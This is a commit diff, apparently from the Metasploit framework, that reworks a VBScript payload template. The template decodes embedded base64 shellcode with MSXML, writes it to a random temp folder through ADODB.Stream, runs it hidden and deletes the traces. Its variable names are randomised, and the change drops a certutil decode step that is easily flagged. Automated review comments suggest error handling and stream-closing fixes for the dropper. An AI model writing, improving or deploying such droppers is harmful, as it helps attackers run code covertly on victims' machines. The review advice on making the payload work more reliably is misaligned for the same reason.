
Commit 629bc00

Use MSXML decoder instead
1 parent 19bd7b9 commit 629bc00

2 files changed

+23
-14
lines changed

Lines changed: 17 additions & 10 deletions
@@ -1,27 +1,34 @@
1+
Function %{var_decodefunc}(%{var_decodebase64})
2+
%{var_xml} = "<B64DECODE xmlns:dt="& Chr(34) & "urn:schemas-microsoft-com:datatypes" & Chr(34) & " " & _
3+
"dt:dt=" & Chr(34) & "bin.base64" & Chr(34) & ">" & _
4+
%{var_decodebase64} & "</B64DECODE>"
5+
Set %{var_xmldoc} = CreateObject("MSXML2.DOMDocument.3.0")
6+
%{var_xmldoc}.LoadXML(%{var_xml})
7+
%{var_decodefunc} = %{var_xmldoc}.selectsinglenode("B64DECODE").nodeTypedValue
8+
set %{var_xmldoc} = nothing
9+
End Function
10+
111
Function %{var_func}()
212
%{var_shellcode} = "%{base64_shellcode}"
3-
413
Dim %{var_obj}
514
Set %{var_obj} = CreateObject("Scripting.FileSystemObject")
6-
Dim %{var_stream}
715
Dim %{var_tempdir}
8-
Dim %{var_tempbase64}
916
Dim %{var_basedir}
1017
Set %{var_tempdir} = %{var_obj}.GetSpecialFolder(2)
1118
%{var_basedir} = %{var_tempdir} & "\" & %{var_obj}.GetTempName()
1219
%{var_obj}.CreateFolder(%{var_basedir})
13-
%{var_tempbase64} = %{var_basedir} & "\" & "%{base64_filename}"
1420
%{var_tempexe} = %{var_basedir} & "\" & "%{exe_filename}"
15-
Set %{var_stream} = %{var_obj}.CreateTextFile(%{var_tempbase64}, true , false)
16-
%{var_stream}.Write %{var_shellcode}
17-
%{var_stream}.Close
1821
Dim %{var_shell}
1922
Set %{var_shell} = CreateObject("Wscript.Shell")
20-
%{var_shell}.run "certutil -decode " & %{var_tempbase64} & " " & %{var_tempexe}, 0, true
23+
%{var_decoded} = %{var_decodefunc}(%{var_shellcode})
24+
Set %{var_adodbstream} = CreateObject("ADODB.Stream")
25+
%{var_adodbstream}.Type = 1
26+
%{var_adodbstream}.Open
27+
%{var_adodbstream}.Write %{var_decoded}
28+
%{var_adodbstream}.SaveToFile %{var_tempexe}, 2
2129
%{var_shell}.run %{var_tempexe}, 0, true
2230
%{var_obj}.DeleteFile(%{var_tempexe})
23-
%{var_obj}.DeleteFile(%{var_tempbase64})
2431
%{var_obj}.DeleteFolder(%{var_basedir})
2532
End Function
2633

27-
%{init}
34+
%{init}
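Review bot: `%{var_xmldoc}.LoadXML(%{var_xml})` discards its Boolean result, so if the document fails to parse `selectsinglenode` returns Nothing and the `.nodeTypedValue` access on the following line raises a runtime error in the generated script instead of failing in a controlled way; guard it with `If Not %{var_xmldoc}.LoadXML(%{var_xml}) Then Exit Function`. The ADODB stream is also never closed after `SaveToFile`; adding `%{var_adodbstream}.Close` before the `run` line releases the object before the dropped executable is run and deleted. Neither `CreateObject` call is checked either, so a host without `MSXML2.DOMDocument.3.0` or `ADODB.Stream` registered will error out rather than degrade; if that matters, an `On Error Resume Next` plus an `Err.Number` check around them is the usual pattern. Note as well that the MSXML bin.base64 decode plus ADODB.Stream drop-and-run sequence is itself a widely recognised VBS pattern, so this change should not be assumed to evade more than the `certutil -decode` it replaces.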

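--- a/lib/msf/util/exe.rb
+++ b/lib/msf/util/exe.rb
@@ -1247,16 +1247,18 @@ def self.to_exe_vbs(exes = '', opts = {})
 hash_sub[:var_shellcode] = Rex::Text.rand_text_alpha(rand(8)+8)
 hash_sub[:var_fname] = Rex::Text.rand_text_alpha(rand(8)+8)
 hash_sub[:var_func] = Rex::Text.rand_text_alpha(rand(8)+8)
-hash_sub[:var_stream] = Rex::Text.rand_text_alpha(rand(8)+8)
 hash_sub[:var_obj] = Rex::Text.rand_text_alpha(rand(8)+8)
 hash_sub[:var_shell] = Rex::Text.rand_text_alpha(rand(8)+8)
 hash_sub[:var_tempdir] = Rex::Text.rand_text_alpha(rand(8)+8)
 hash_sub[:var_tempexe] = Rex::Text.rand_text_alpha(rand(8)+8)
-hash_sub[:var_tempbase64] = Rex::Text.rand_text_alpha(rand(8)+8)
 hash_sub[:var_basedir] = Rex::Text.rand_text_alpha(rand(8)+8)
-
 hash_sub[:base64_shellcode] = Rex::Text.encode_base64(exes)
-
+hash_sub[:var_decodefunc] = Rex::Text.rand_text_alpha(rand(8)+8)
+hash_sub[:var_xml] = Rex::Text.rand_text_alpha(rand(8)+8)
+hash_sub[:var_xmldoc] = Rex::Text.rand_text_alpha(rand(8)+8)
+hash_sub[:var_decoded] = Rex::Text.rand_text_alpha(rand(8)+8)
+hash_sub[:var_adodbstream] = Rex::Text.rand_text_alpha(rand(8)+8)
+hash_sub[:var_decodebase64] = Rex::Text.rand_text_alpha(rand(8)+8)
 hash_sub[:init] = ""
 
 if persist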
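Review bot: The fourteen identical `hash_sub[...] = Rex::Text.rand_text_alpha(rand(8)+8)` assignments, six of them added by this hunk, are easier to keep in step with the VBS template if the keys are listed once and assigned in a loop, since the template is the only consumer and a key that is missing or misspelled here shows up only as a literal `%{var_...}` in the generated script. A short list-and-loop form also makes the next template change a one-token edit. `to_exe_vbs` begins above the hunk and continues past `if persist`, so the surrounding assignments to `hash_sub` are not visible here.

```ruby
[:var_shellcode, :var_fname, :var_func, :var_obj, :var_shell, :var_tempdir,
 :var_tempexe, :var_basedir, :var_decodefunc, :var_xml, :var_xmldoc,
 :var_decoded, :var_adodbstream, :var_decodebase64].each do |key|
  hash_sub[key] = Rex::Text.rand_text_alpha(rand(8)+8)
end
hash_sub[:base64_shellcode] = Rex::Text.encode_base64(exes)
# ... unchanged: hash_sub[:init] = "" and the persist branch ...
```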
